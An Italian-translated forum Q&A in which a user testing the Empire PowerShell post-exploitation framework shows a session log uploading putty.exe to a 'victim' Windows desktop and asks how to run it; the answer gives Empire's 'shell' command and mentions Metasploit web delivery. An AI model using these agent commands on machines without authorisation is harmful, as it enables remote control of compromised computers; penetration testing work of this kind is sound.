Impero controlla i comandi di PowerShell

4

Sto testando Empire Powershell.

Mi stavo chiedendo come è possibile eseguire un file da remoto dopo averlo caricato sul computer della vittima?

(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > upload /root/Testpc/putty.exe
(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > dir
(Empire: ANHGP22NCFLPVAAH) > 
LastWriteTime      Length Name                                       
-------------      ------ ----                                       
11-1-2017 23:27:49    282 desktop.ini                                
20-2-2017 0:50:37  531368 putty.exe 
(Empire: ANHGP22NCFLPVAAH) > (what are the commands to remotly execute the putty.exe file)
    
posta alien187 20.02.2017 - 02:09
fonte

1 risposta

1

Puoi usare il comando shell .

Dalla schermata di aiuto:

shell: Task an agent to use a shell command.

Nel tuo caso, eseguire putty.exe sarebbe come tale:

(Empire: Win10Priv) > shell <pathtoputty>\putty.exe

Puoi anche farlo per eseguire i comandi di consegna web Metasploit, in un modo più semplice se esegui la migrazione da Empire a Msf.

    
risposta data 20.04.2017 - 01:04
fonte

Leggi altre domande sui tag